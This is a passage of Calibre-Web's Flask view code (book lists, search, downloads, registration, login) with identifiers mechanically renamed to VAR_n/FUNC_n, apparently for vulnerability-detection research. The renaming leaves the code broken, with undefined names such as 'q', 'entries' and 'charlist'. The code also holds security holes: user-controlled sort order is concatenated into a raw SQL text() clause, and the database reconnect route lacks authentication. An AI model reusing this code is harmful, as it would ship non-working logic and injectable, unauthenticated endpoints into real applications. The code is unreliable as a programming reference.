VAR_76 = db.books_series_link, db.Books.id == db.books_series_link.c.book, db.Series
VAR_63, VAR_77, VAR_65 = calibre_db.get_search_results(VAR_17, VAR_18, VAR_10, VAR_19, *VAR_76)
return render_title_template('search.html',
VAR_35=VAR_17,
VAR_65=pagination,
VAR_56=VAR_17,
adv_searchterm=VAR_17,
VAR_63=entries,
VAR_77=result_count,
VAR_149=_(u"Search"),
VAR_9="search")
@VAR_2.route("/", defaults={'page': 1})
@VAR_2.route('/VAR_9/<int:VAR_9>')
@login_required_if_no_ano
def FUNC_31(VAR_9):
VAR_20 = (request.args.get('sort') or 'stored').lower()
return FUNC_15("newest", VAR_20, 1, VAR_9)
@VAR_2.route('/<VAR_8>/<VAR_20>', defaults={'page': 1, 'book_id': 1})
@VAR_2.route('/<VAR_8>/<VAR_20>/', defaults={'page': 1, 'book_id': 1})
@VAR_2.route('/<VAR_8>/<VAR_20>/<VAR_5>', defaults={'page': 1})
@VAR_2.route('/<VAR_8>/<VAR_20>/<VAR_5>/<int:VAR_9>')
@login_required_if_no_ano
def FUNC_32(VAR_8, VAR_20, VAR_5, VAR_9):
return FUNC_15(VAR_8, VAR_20, VAR_5, VAR_9)
@VAR_2.route("/table")
@login_required
def FUNC_33():
VAR_78 = VAR_87.view_settings.get('table', {})
return render_title_template('book_table.html', VAR_149=_(u"Books List"), VAR_9="book_table",
visiblility=VAR_78)
@VAR_2.route("/ajax/listbooks")
@login_required
def FUNC_34():
VAR_79 = int(request.args.get("offset") or 0)
VAR_19 = int(request.args.get("limit") or config.config_books_per_page)
VAR_80 = request.args.get("search")
VAR_7 = request.args.get("sort", "id")
VAR_10 = request.args.get("order", "").lower()
VAR_81 = None
VAR_76 = tuple()
if VAR_7 == "state":
VAR_81 = json.loads(request.args.get("state", "[]"))
elif VAR_7 == "tags":
VAR_10 = [db.Tags.name.asc()] if VAR_10 == "asc" else [db.Tags.name.desc()]
VAR_76 = db.books_tags_link,db.Books.id == db.books_tags_link.c.book, db.Tags
elif VAR_7 == "series":
VAR_10 = [db.Series.name.asc()] if VAR_10 == "asc" else [db.Series.name.desc()]
VAR_76 = db.books_series_link,db.Books.id == db.books_series_link.c.book, db.Series
elif VAR_7 == "publishers":
VAR_10 = [db.Publishers.name.asc()] if VAR_10 == "asc" else [db.Publishers.name.desc()]
VAR_76 = db.books_publishers_link,db.Books.id == db.books_publishers_link.c.book, db.Publishers
elif VAR_7 == "authors":
VAR_10 = [db.Authors.name.asc(), db.Series.name, db.Books.series_index] if VAR_10 == "asc" \
else [db.Authors.name.desc(), db.Series.name.desc(), db.Books.series_index.desc()]
VAR_76 = db.books_authors_link, db.Books.id == db.books_authors_link.c.book, db.Authors, \
db.books_series_link, db.Books.id == db.books_series_link.c.book, db.Series
elif VAR_7 == "languages":
VAR_10 = [db.Languages.lang_code.asc()] if VAR_10 == "asc" else [db.Languages.lang_code.desc()]
VAR_76 = db.books_languages_link, db.Books.id == db.books_languages_link.c.book, db.Languages
elif VAR_10 and VAR_7 in ["sort", "title", "authors_sort", "series_index"]:
VAR_10 = [text(VAR_7 + " " + VAR_10)]
elif not VAR_81:
VAR_10 = [db.Books.timestamp.desc()]
VAR_82 = VAR_83 = calibre_db.session.query(db.Books).count()
if VAR_81:
if VAR_80:
VAR_127 = calibre_db.search_query(VAR_80).all()
VAR_83 = len(VAR_127)
else:
VAR_127 = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()).all()
VAR_63 = calibre_db.get_checkbox_sorted(VAR_127, VAR_81, VAR_79, VAR_19, VAR_10)
elif VAR_80:
VAR_63, VAR_83, VAR_64 = calibre_db.get_search_results(VAR_80, VAR_79, VAR_10, VAR_19, *VAR_76)
else:
VAR_63, VAR_64, VAR_64 = calibre_db.fill_indexpage((int(VAR_79) / (int(VAR_19)) + 1), VAR_19, db.Books, True, VAR_10, *VAR_76)
for entry in VAR_63:
for FUNC_31 in range(0, len(entry.languages)):
entry.languages[FUNC_31].language_name = isoLanguages.get_language_name(get_locale(), entry.languages[
FUNC_31].lang_code)
VAR_84 = {'totalNotFiltered': VAR_82, 'total': VAR_83, "rows": VAR_63}
VAR_85 = json.dumps(VAR_84, cls=db.AlchemyEncoder)
VAR_86 = make_response(VAR_85)
VAR_86.headers["Content-Type"] = "application/json; charset=utf-8"
return VAR_86
@VAR_2.route("/ajax/table_settings", methods=['POST'])
@login_required
def FUNC_35():
VAR_87.view_settings['table'] = json.loads(request.data)
try:
try:
flag_modified(VAR_87, "view_settings")
except AttributeError:
pass
ub.session.commit()
except (InvalidRequestError, OperationalError):
VAR_3.error("Invalid request received: %r ", request, )
return "Invalid request", 400
return ""
@VAR_2.route("/author")
@login_required_if_no_ano
def FUNC_36():
if VAR_87.check_visibility(constants.SIDEBAR_AUTHOR):
if VAR_87.get_view_property('author', 'dir') == 'desc':
VAR_10 = db.Authors.sort.desc()
VAR_109 = 0
else:
VAR_10 = db.Authors.sort.asc()
VAR_109 = 1
VAR_63 = calibre_db.session.query(db.Authors, func.count('books_authors_link.book').label('count')) \
.join(db.books_authors_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(text('books_authors_link.author')).order_by(VAR_10).all()
VAR_107 = calibre_db.session.query(func.upper(func.substr(db.Authors.sort, 1, 1)).label('char')) \
.join(db.books_authors_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(func.upper(func.substr(db.Authors.sort, 1, 1))).all()
VAR_108 = copy.deepcopy(VAR_63)
for entry in VAR_108:
entry.Authors.name = entry.Authors.name.replace('|', ',')
return render_title_template('list.html', VAR_63=VAR_108, folder='web.books_list', VAR_107=charlist,
VAR_149=u"Authors", VAR_9="authorlist", VAR_8='author', VAR_10=VAR_109)
else:
abort(404)
@VAR_2.route("/downloadlist")
@login_required_if_no_ano
def FUNC_37():
if VAR_87.get_view_property('download', 'dir') == 'desc':
VAR_10 = ub.User.name.desc()
VAR_109 = 0
else:
VAR_10 = ub.User.name.asc()
VAR_109 = 1
if VAR_87.check_visibility(constants.SIDEBAR_DOWNLOAD) and VAR_87.role_admin():
VAR_63 = ub.session.query(ub.User, func.count(ub.Downloads.book_id).label('count'))\
.join(ub.Downloads).group_by(ub.Downloads.user_id).order_by(VAR_10).all()
VAR_107 = ub.session.query(func.upper(func.substr(ub.User.name, 1, 1)).label('char')) \
.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS) \
.group_by(func.upper(func.substr(ub.User.name, 1, 1))).all()
return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=charlist,
VAR_149=_(u"Downloads"), VAR_9="downloadlist", VAR_8="download", VAR_10=VAR_109)
else:
abort(404)
@VAR_2.route("/publisher")
@login_required_if_no_ano
def FUNC_38():
if VAR_87.get_view_property('publisher', 'dir') == 'desc':
VAR_10 = db.Publishers.name.desc()
VAR_109 = 0
else:
VAR_10 = db.Publishers.name.asc()
VAR_109 = 1
if VAR_87.check_visibility(constants.SIDEBAR_PUBLISHER):
VAR_63 = calibre_db.session.query(db.Publishers, func.count('books_publishers_link.book').label('count')) \
.join(db.books_publishers_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(text('books_publishers_link.publisher')).order_by(VAR_10).all()
VAR_107 = calibre_db.session.query(func.upper(func.substr(db.Publishers.name, 1, 1)).label('char')) \
.join(db.books_publishers_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(func.upper(func.substr(db.Publishers.name, 1, 1))).all()
return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=charlist,
VAR_149=_(u"Publishers"), VAR_9="publisherlist", VAR_8="publisher", VAR_10=VAR_109)
else:
abort(404)
@VAR_2.route("/series")
@login_required_if_no_ano
def FUNC_39():
if VAR_87.check_visibility(constants.SIDEBAR_SERIES):
if VAR_87.get_view_property('series', 'dir') == 'desc':
VAR_10 = db.Series.sort.desc()
VAR_109 = 0
else:
VAR_10 = db.Series.sort.asc()
VAR_109 = 1
if VAR_87.get_view_property('series', 'series_view') == 'list':
VAR_63 = calibre_db.session.query(db.Series, func.count('books_series_link.book').label('count')) \
.join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(text('books_series_link.series')).order_by(VAR_10).all()
VAR_107 = calibre_db.session.query(func.upper(func.substr(db.Series.sort, 1, 1)).label('char')) \
.join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(func.upper(func.substr(db.Series.sort, 1, 1))).all()
return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=charlist,
VAR_149=_(u"Series"), VAR_9="serieslist", VAR_8="series")
else:
VAR_63 = calibre_db.session.query(db.Books, func.count('books_series_link').label('count')) \
.join(db.books_series_link).join(db.Series).filter(calibre_db.common_filters()) \
.group_by(text('books_series_link.series')).order_by(VAR_10).all()
VAR_107 = calibre_db.session.query(func.upper(func.substr(db.Series.sort, 1, 1)).label('char')) \
.join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(func.upper(func.substr(db.Series.sort, 1, 1))).all()
return render_title_template('grid.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=charlist,
VAR_149=_(u"Series"), VAR_9="serieslist", VAR_8="series", bodyClass="grid-view",
VAR_10=VAR_109)
else:
abort(404)
@VAR_2.route("/ratings")
@login_required_if_no_ano
def FUNC_40():
if VAR_87.check_visibility(constants.SIDEBAR_RATING):
if VAR_87.get_view_property('ratings', 'dir') == 'desc':
VAR_10 = db.Ratings.rating.desc()
VAR_109 = 0
else:
VAR_10 = db.Ratings.rating.asc()
VAR_109 = 1
VAR_63 = calibre_db.session.query(db.Ratings, func.count('books_ratings_link.book').label('count'),
(db.Ratings.rating / 2).label('name')) \
.join(db.books_ratings_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(text('books_ratings_link.rating')).order_by(VAR_10).all()
return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=list(),
VAR_149=_(u"Ratings list"), VAR_9="ratingslist", VAR_8="ratings", VAR_10=VAR_109)
else:
abort(404)
@VAR_2.route("/formats")
@login_required_if_no_ano
def FUNC_41():
if VAR_87.check_visibility(constants.SIDEBAR_FORMAT):
if VAR_87.get_view_property('ratings', 'dir') == 'desc':
VAR_10 = db.Data.format.desc()
VAR_109 = 0
else:
VAR_10 = db.Data.format.asc()
VAR_109 = 1
VAR_63 = calibre_db.session.query(db.Data,
func.count('data.book').label('count'),
db.Data.format.label('format')) \
.join(db.Books).filter(calibre_db.common_filters()) \
.group_by(db.Data.format).order_by(VAR_10).all()
return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=list(),
VAR_149=_(u"File formats list"), VAR_9="formatslist", VAR_8="formats", VAR_10=VAR_109)
else:
abort(404)
@VAR_2.route("/language")
@login_required_if_no_ano
def FUNC_42():
if VAR_87.check_visibility(constants.SIDEBAR_LANGUAGE):
VAR_107 = list()
if VAR_87.filter_language() == u"all":
VAR_48 = calibre_db.speaking_language()
else:
VAR_48 = calibre_db.session.query(db.Languages).filter(
db.Languages.lang_code == VAR_87.filter_language()).all()
VAR_48[0].name = isoLanguages.get_language_name(get_locale(), VAR_48[0].name.lang_code)
VAR_110 = calibre_db.session.query(db.books_languages_link,
func.count('books_languages_link.book').label('bookcount')).group_by(
text('books_languages_link.lang_code')).all()
return render_title_template('languages.html', VAR_48=languages, VAR_110=lang_counter,
VAR_107=charlist, VAR_149=_(u"Languages"), VAR_9="langlist",
VAR_8="language")
else:
abort(404)
@VAR_2.route("/category")
@login_required_if_no_ano
def FUNC_43():
if VAR_87.check_visibility(constants.SIDEBAR_CATEGORY):
if VAR_87.get_view_property('category', 'dir') == 'desc':
VAR_10 = db.Tags.name.desc()
VAR_109 = 0
else:
VAR_10 = db.Tags.name.asc()
VAR_109 = 1
VAR_63 = calibre_db.session.query(db.Tags, func.count('books_tags_link.book').label('count')) \
.join(db.books_tags_link).join(db.Books).order_by(VAR_10).filter(calibre_db.common_filters()) \
.group_by(text('books_tags_link.tag')).all()
VAR_107 = calibre_db.session.query(func.upper(func.substr(db.Tags.name, 1, 1)).label('char')) \
.join(db.books_tags_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(func.upper(func.substr(db.Tags.name, 1, 1))).all()
return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=charlist,
VAR_149=_(u"Categories"), VAR_9="catlist", VAR_8="category", VAR_10=VAR_109)
else:
abort(404)
@VAR_2.route("/tasks")
@login_required
def FUNC_44():
VAR_51 = WorkerThread.getInstance().tasks
VAR_88 = render_task_status(VAR_51)
return render_title_template('tasks.html', VAR_63=VAR_88, VAR_149=_(u"Tasks"), VAR_9="tasks")
@app.route("/reconnect")
def FUNC_45():
calibre_db.reconnect_db(config, ub.app_DB_path)
return json.dumps({})
@VAR_2.route("/search", methods=["GET"])
@login_required_if_no_ano
def VAR_80():
VAR_17 = request.args.get("query")
if VAR_17:
return redirect(url_for('web.books_list', VAR_8="search", VAR_20='stored', VAR_56=VAR_17))
else:
return render_title_template('search.html',
VAR_35="",
VAR_77=0,
VAR_149=_(u"Search"),
VAR_9="search")
@VAR_2.route("/advsearch", methods=['POST'])
@login_required_if_no_ano
def FUNC_47():
VAR_89 = dict(request.form)
VAR_90 = ['include_tag', 'exclude_tag', 'include_serie', 'exclude_serie', 'include_shelf', 'exclude_shelf',
'include_language', 'exclude_language', 'include_extension', 'exclude_extension']
for VAR_111 in VAR_90:
VAR_89[VAR_111] = list(request.form.getlist(VAR_111))
VAR_91['query'] = json.dumps(VAR_89)
return redirect(url_for('web.books_list', VAR_8="advsearch", VAR_20='stored', VAR_56=""))
def FUNC_48(VAR_16, VAR_17, VAR_21):
for c in VAR_16:
if c.datatype == "datetime":
VAR_128 = VAR_17.get('custom_column_' + str(c.id) + '_start')
VAR_129 = VAR_17.get('custom_column_' + str(c.id) + '_end')
if VAR_128:
VAR_21 = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
func.datetime(db.cc_classes[c.id].value) >= func.datetime(VAR_128)))
if VAR_129:
VAR_21 = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
func.datetime(db.cc_classes[c.id].value) <= func.datetime(VAR_129)))
else:
VAR_130 = VAR_17.get('custom_column_' + str(c.id))
if VAR_130 != '' and VAR_130 is not None:
if c.datatype == 'bool':
VAR_21 = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
db.cc_classes[c.id].value == (VAR_130 == "True")))
elif c.datatype == 'int' or c.datatype == 'float':
VAR_21 = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
db.cc_classes[c.id].value == VAR_130))
elif c.datatype == 'rating':
VAR_21 = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
db.cc_classes[c.id].value == int(float(VAR_130) * 2)))
else:
VAR_21 = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
func.lower(db.cc_classes[c.id].value).ilike("%" + VAR_130 + "%")))
return VAR_21
def FUNC_49(VAR_21, VAR_22, VAR_23):
if VAR_87.filter_language() != "all":
VAR_21 = q.filter(db.Books.languages.any(db.Languages.lang_code == VAR_87.filter_language()))
else:
for language in VAR_22:
VAR_21 = q.filter(db.Books.languages.any(db.Languages.id == language))
for language in VAR_23:
VAR_21 = q.filter(not_(db.Books.series.any(db.Languages.id == language)))
return VAR_21
def FUNC_50(VAR_21, VAR_24, VAR_25):
if VAR_24:
VAR_24 = int(VAR_24) * 2
VAR_21 = q.filter(db.Books.ratings.any(db.Ratings.rating <= VAR_24))
if VAR_25:
rating_low = int(VAR_25) * 2
VAR_21 = q.filter(db.Books.ratings.any(db.Ratings.rating >= VAR_25))
return VAR_21
def FUNC_51(VAR_21, VAR_26):
if VAR_26:
if config.config_read_column:
try:
if VAR_26 == "True":
VAR_21 = q.join(db.cc_classes[config.config_read_column], isouter=True) \
.filter(db.cc_classes[config.config_read_column].value == True)
else:
VAR_21 = q.join(db.cc_classes[config.config_read_column], isouter=True) \
.filter(coalesce(db.cc_classes[config.config_read_column].value, False) != True)
except (KeyError, AttributeError):
VAR_3.error(u"Custom Column No.%d is not existing in calibre database", config.config_read_column)
flash(_("Custom Column No.%(column)d is not existing in calibre database",
column=config.config_read_column),
category="error")
return VAR_21
else:
if VAR_26 == "True":
VAR_21 = q.join(ub.ReadBook, db.Books.id == ub.ReadBook.book_id, isouter=True) \
.filter(ub.ReadBook.user_id == int(VAR_87.id),
ub.ReadBook.read_status == ub.ReadBook.STATUS_FINISHED)
else:
VAR_21 = q.join(ub.ReadBook, db.Books.id == ub.ReadBook.book_id, isouter=True) \
.filter(ub.ReadBook.user_id == int(VAR_87.id),
coalesce(ub.ReadBook.read_status, 0) != ub.ReadBook.STATUS_FINISHED)
return VAR_21
def FUNC_52(VAR_21, VAR_27, VAR_28):
for extension in VAR_27:
VAR_21 = q.filter(db.Books.data.any(db.Data.format == extension))
for extension in VAR_28:
VAR_21 = q.filter(not_(db.Books.data.any(db.Data.format == extension)))
return VAR_21
def FUNC_53(VAR_21, VAR_29, VAR_30):
for tag in VAR_29:
VAR_21 = q.filter(db.Books.tags.any(db.Tags.id == tag))
for tag in VAR_30:
VAR_21 = q.filter(not_(db.Books.tags.any(db.Tags.id == tag)))
return VAR_21
def FUNC_54(VAR_21, VAR_31, VAR_32):
for serie in VAR_31:
VAR_21 = q.filter(db.Books.series.any(db.Series.id == serie))
for serie in VAR_32:
VAR_21 = q.filter(not_(db.Books.series.any(db.Series.id == serie)))
return VAR_21
def FUNC_55(VAR_21, VAR_33, VAR_34):
VAR_21 = q.outerjoin(ub.BookShelf, db.Books.id == ub.BookShelf.book_id)\
.filter(or_(ub.BookShelf.shelf == None, ub.BookShelf.shelf.notin_(VAR_34)))
if len(VAR_33) > 0:
VAR_21 = q.filter(ub.BookShelf.shelf.in_(VAR_33))
return VAR_21
def FUNC_56(VAR_35,
VAR_36,
VAR_37,
VAR_38,
VAR_39,
VAR_40,
VAR_41,
VAR_24,
VAR_25,
VAR_26,
):
VAR_35.extend((VAR_36.replace('|', ','), VAR_37, VAR_38))
if VAR_39:
try:
VAR_35.extend([_(u"Published after ") +
format_date(datetime.strptime(VAR_39, "%Y-%m-%d"),
format='medium', locale=get_locale())])
except ValueError:
VAR_39 = u""
if VAR_40:
try:
VAR_35.extend([_(u"Published before ") +
format_date(datetime.strptime(VAR_40, "%Y-%m-%d"),
format='medium', locale=get_locale())])
except ValueError:
VAR_39 = u""
VAR_92 = {'tag': db.Tags, 'serie':db.Series, 'shelf':ub.Shelf}
for key, db_element in VAR_92.items():
VAR_112 = calibre_db.session.query(db_element).filter(db_element.id.in_(VAR_41['include_' + key])).all()
VAR_35.extend(tag.name for tag in VAR_112)
tag_names = calibre_db.session.query(db_element).filter(db_element.id.in_(VAR_41['exclude_' + key])).all()
VAR_35.extend(tag.name for tag in VAR_112)
VAR_57 = calibre_db.session.query(db.Languages). \
filter(db.Languages.id.in_(VAR_41['include_language'])).all()
if VAR_57:
language_names = calibre_db.speaking_language(VAR_57)
VAR_35.extend(language.name for language in VAR_57)
VAR_57 = calibre_db.session.query(db.Languages). \
filter(db.Languages.id.in_(VAR_41['exclude_language'])).all()
if VAR_57:
language_names = calibre_db.speaking_language(VAR_57)
VAR_35.extend(language.name for language in VAR_57)
if VAR_24:
VAR_35.extend([_(u"Rating <= %(rating)s", rating=VAR_24)])
if VAR_25:
VAR_35.extend([_(u"Rating >= %(rating)s", rating=VAR_25)])
if VAR_26:
VAR_35.extend([_(u"Read Status = %(status)s", status=VAR_26)])
VAR_35.extend(ext for ext in VAR_41['include_extension'])
VAR_35.extend(ext for ext in VAR_41['exclude_extension'])
VAR_35 = " + ".join(filter(None, VAR_35))
return VAR_35, VAR_39, VAR_40
def FUNC_57(VAR_17, VAR_18=None, VAR_10=None, VAR_19=None):
VAR_10 = VAR_10 or [db.Books.sort]
VAR_65 = None
VAR_16 = get_cc_columns(filter_config_custom_read=True)
calibre_db.session.connection().connection.connection.create_function("lower", 1, db.lcase)
VAR_21 = calibre_db.session.query(db.Books).outerjoin(db.books_series_link, db.Books.id == db.books_series_link.c.book)\
.outerjoin(db.Series)\
.filter(calibre_db.common_filters(True))
VAR_41 = dict()
VAR_92 = ['tag', 'serie', 'shelf', 'language', 'extension']
for VAR_113 in VAR_92:
VAR_41['include_' + VAR_113] = VAR_17.get('include_' + VAR_113)
VAR_41['exclude_' + VAR_113] = VAR_17.get('exclude_' + VAR_113)
VAR_36 = VAR_17.get("author_name")
VAR_37 = VAR_17.get("book_title")
VAR_38 = VAR_17.get("publisher")
VAR_39 = VAR_17.get("publishstart")
VAR_40 = VAR_17.get("publishend")
VAR_25 = VAR_17.get("ratinghigh")
VAR_24 = VAR_17.get("ratinglow")
VAR_93 = VAR_17.get("comment")
VAR_26 = VAR_17.get("read_status")
if VAR_36:
VAR_36 = VAR_36.strip().lower().replace(',', '|')
if VAR_37:
VAR_37 = VAR_37.strip().lower()
if VAR_38:
VAR_38 = VAR_38.strip().lower()
VAR_35 = []
VAR_94 = False
for c in VAR_16:
if c.datatype == "datetime":
VAR_131 = VAR_17.get('custom_column_' + str(c.id) + '_start')
VAR_132 = VAR_17.get('custom_column_' + str(c.id) + '_end')
if VAR_131:
VAR_35.extend([u"{} >= {}".format(c.name,
format_date(datetime.strptime(VAR_131, "%Y-%m-%d"),
format='medium',
locale=get_locale())
)])
VAR_94 = True
if VAR_132:
VAR_35.extend([u"{} <= {}".format(c.name,
format_date(datetime.strptime(VAR_132, "%Y-%m-%d").date(),
format='medium',
locale=get_locale())
)])
VAR_94 = True
elif VAR_17.get('custom_column_' + str(c.id)):
VAR_35.extend([(u"{}: {}".format(c.name, VAR_17.get('custom_column_' + str(c.id))))])
VAR_94 = True
if any(VAR_41.values()) or VAR_36 or VAR_37 or VAR_38 or VAR_39 or VAR_40 or VAR_25 \
or VAR_24 or VAR_93 or VAR_94 or VAR_26:
VAR_35, VAR_39, VAR_40 = FUNC_56(VAR_35,
VAR_36,
VAR_37,
VAR_38,
VAR_39,
VAR_40,
VAR_41,
VAR_24,
VAR_25,
VAR_26)
VAR_21 = q.filter()
if VAR_36:
VAR_21 = q.filter(db.Books.authors.any(func.lower(db.Authors.name).ilike("%" + VAR_36 + "%")))
if VAR_37:
VAR_21 = q.filter(func.lower(db.Books.title).ilike("%" + VAR_37 + "%"))
if VAR_39:
VAR_21 = q.filter(func.datetime(db.Books.pubdate) > func.datetime(VAR_39))
if VAR_40:
VAR_21 = q.filter(func.datetime(db.Books.pubdate) < func.datetime(VAR_40))
VAR_21 = FUNC_51(VAR_21, VAR_26)
if VAR_38:
VAR_21 = q.filter(db.Books.publishers.any(func.lower(db.Publishers.name).ilike("%" + VAR_38 + "%")))
VAR_21 = FUNC_53(VAR_21, VAR_41['include_tag'], VAR_41['exclude_tag'])
VAR_21 = FUNC_54(VAR_21, VAR_41['include_serie'], VAR_41['exclude_serie'])
VAR_21 = FUNC_55(VAR_21, VAR_41['include_shelf'], VAR_41['exclude_shelf'])
VAR_21 = FUNC_52(VAR_21, VAR_41['include_extension'], VAR_41['exclude_extension'])
VAR_21 = FUNC_49(VAR_21, VAR_41['include_language'], VAR_41['exclude_language'])
VAR_21 = FUNC_50(VAR_21, VAR_24, VAR_25)
if VAR_93:
VAR_21 = q.filter(db.Books.comments.any(func.lower(db.Comments.text).ilike("%" + VAR_93 + "%")))
try:
VAR_21 = FUNC_48(VAR_16, VAR_17, VAR_21)
except AttributeError as ex:
VAR_3.debug_or_exception(ex)
flash(_("Error on VAR_80 for custom columns, please restart Calibre-Web"), category="error")
VAR_21 = q.order_by(*VAR_10).all()
VAR_91['query'] = json.dumps(VAR_17)
ub.store_ids(VAR_21)
VAR_77 = len(VAR_21)
if VAR_18 != None and VAR_19 != None:
VAR_18 = int(VAR_18)
VAR_114 = VAR_18 + int(VAR_19)
VAR_65 = Pagination((VAR_18 / (int(VAR_19)) + 1), VAR_19, VAR_77)
else:
VAR_18 = 0
VAR_114 = VAR_77
return render_title_template('search.html',
adv_searchterm=VAR_35,
VAR_65=pagination,
VAR_63=VAR_21[VAR_18:VAR_114],
VAR_77=result_count,
VAR_149=_(u"Advanced Search"), VAR_9="advsearch")
@VAR_2.route("/advsearch", methods=['GET'])
@login_required_if_no_ano
def FUNC_58():
VAR_16 = get_cc_columns(filter_config_custom_read=True)
return FUNC_29(VAR_16)
@VAR_2.route("/cover/<int:VAR_5>")
@login_required_if_no_ano
def FUNC_59(VAR_5):
return get_book_cover(VAR_5)
@VAR_2.route("/robots.txt")
def FUNC_60():
return send_from_directory(constants.STATIC_DIR, "robots.txt")
@VAR_2.route("/show/<int:VAR_5>/<VAR_6>", defaults={'anyname': 'None'})
@VAR_2.route("/show/<int:VAR_5>/<VAR_6>/<VAR_42>")
@login_required_if_no_ano
@FUNC_2
def FUNC_61(VAR_5, VAR_6, VAR_42):
VAR_6 = VAR_6.split(".")[0]
VAR_95 = calibre_db.get_book(VAR_5)
VAR_8 = calibre_db.get_book_format(VAR_5, VAR_6.upper())
if not VAR_8:
return "File not in Database"
VAR_3.info('Serving VAR_95: %s', VAR_8.name)
if config.config_use_google_drive:
try:
VAR_133 = Headers()
VAR_133["Content-Type"] = mimetypes.types_map.get('.' + VAR_6, "application/octet-stream")
VAR_134 = getFileFromEbooksFolder(VAR_95.path, VAR_8.name + "." + VAR_6)
return do_gdrive_download(VAR_134, VAR_133, (VAR_6.upper() == 'TXT'))
except AttributeError as ex:
VAR_3.debug_or_exception(ex)
return "File Not Found"
else:
if VAR_6.upper() == 'TXT':
try:
VAR_145 = open(os.path.join(config.config_calibre_dir, VAR_95.path, VAR_8.name + "." + VAR_6),
"rb").read()
VAR_135 = chardet.detect(VAR_145)
return make_response(
VAR_145.decode(VAR_135['encoding'], 'surrogatepass').encode('utf-8', 'surrogatepass'))
except FileNotFoundError:
VAR_3.error("File Not Found")
return "File Not Found"
return send_from_directory(os.path.join(config.config_calibre_dir, VAR_95.path), VAR_8.name + "." + VAR_6)
@VAR_2.route("/download/<int:VAR_5>/<VAR_6>", defaults={'anyname': 'None'})
@VAR_2.route("/download/<int:VAR_5>/<VAR_6>/<VAR_42>")
@login_required_if_no_ano
@FUNC_1
def FUNC_62(VAR_5, VAR_6, VAR_42):
VAR_96 = "kobo" if "Kobo" in request.headers.get('User-Agent') else ""
return get_download_link(VAR_5, VAR_6, VAR_96)
@VAR_2.route('/send/<int:VAR_5>/<VAR_6>/<int:VAR_43>')
@login_required
@FUNC_1
def FUNC_63(VAR_5, VAR_6, VAR_43):
if not config.get_mail_server_configured():
flash(_(u"Please configure the SMTP mail settings first..."), category="error")
elif VAR_87.kindle_mail:
VAR_135 = send_mail(VAR_5, VAR_6, VAR_43, VAR_87.kindle_mail, config.config_calibre_dir,
VAR_87.name)
if VAR_135 is None:
flash(_(u"Book successfully queued for sending to %(kindlemail)s", kindlemail=VAR_87.kindle_mail),
category="success")
ub.update_download(VAR_5, int(VAR_87.id))
else:
flash(_(u"Oops! There was an VAR_139 sending this VAR_95: %(res)s", res=VAR_135), category="error")
else:
flash(_(u"Please update your FUNC_68 with a valid Send to Kindle E-mail Address."), category="error")
if "HTTP_REFERER" in request.environ:
return redirect(request.environ["HTTP_REFERER"])
else:
return redirect(url_for('web.index'))
@VAR_2.route('/register', methods=['GET', 'POST'])
def FUNC_64():
if not config.config_public_reg:
abort(404)
if VAR_87 is not None and VAR_87.is_authenticated:
return redirect(url_for('web.index'))
if not config.get_mail_server_configured():
flash(_(u"E-Mail server is not configured, please contact your administrator!"), category="error")
return render_title_template('register.html', VAR_149=_("Register"), VAR_9="register")
if request.method == "POST":
VAR_55 = request.form.to_dict()
VAR_115 = VAR_55["email"].strip() if config.config_register_email else VAR_55.get('name')
if not VAR_115 or not VAR_55.get("email"):
flash(_(u"Please fill out all fields!"), category="error")
return render_title_template('register.html', VAR_149=_("Register"), VAR_9="register")
try:
VAR_115 = check_username(VAR_115)
VAR_136 = check_email(VAR_55["email"])
except Exception as ex:
flash(str(ex), category="error")
return render_title_template('register.html', VAR_149=_("Register"), VAR_9="register")
VAR_116 = ub.User()
if check_valid_domain(VAR_136):
VAR_116.name = VAR_115
VAR_116.email = VAR_136
VAR_137 = generate_random_password()
VAR_116.password = generate_password_hash(VAR_137)
VAR_116.role = config.config_default_role
VAR_116.sidebar_view = config.config_default_show
try:
ub.session.add(VAR_116)
ub.session.commit()
if VAR_0['oauth']:
register_user_with_oauth(VAR_116)
send_registration_mail(VAR_55["email"].strip(), VAR_115, VAR_137)
except Exception:
ub.session.rollback()
flash(_(u"An unknown VAR_139 occurred. Please try again later."), category="error")
return render_title_template('register.html', VAR_149=_("Register"), VAR_9="register")
else:
flash(_(u"Your e-mail is not allowed to register"), category="error")
VAR_3.warning('Registering failed for VAR_104 "%s" e-mail address: %s', VAR_115, VAR_55["email"])
return render_title_template('register.html', VAR_149=_("Register"), VAR_9="register")
flash(_(u"Confirmation e-mail was send to your e-mail account."), category="success")
return redirect(url_for('web.login'))
if VAR_0['oauth']:
register_user_with_oauth()
return render_title_template('register.html', config=config, VAR_149=_("Register"), VAR_9="register")
@VAR_2.route('/login', methods=['GET', 'POST'])
def FUNC_65():
if VAR_87 is not None and VAR_87.is_authenticated:
return redirect(url_for('web.index'))
if config.config_login_type == constants.LOGIN_LDAP and not services.ldap:
VAR_3.error(u"Cannot activate LDAP authentication")
flash(_(u"Cannot activate LDAP authentication"), category="error")
if request.method == "POST":
VAR_117 = request.form.to_dict()
VAR_104 = ub.session.query(ub.User).filter(func.lower(ub.User.name) == VAR_117['username'].strip().lower()) \
.first()
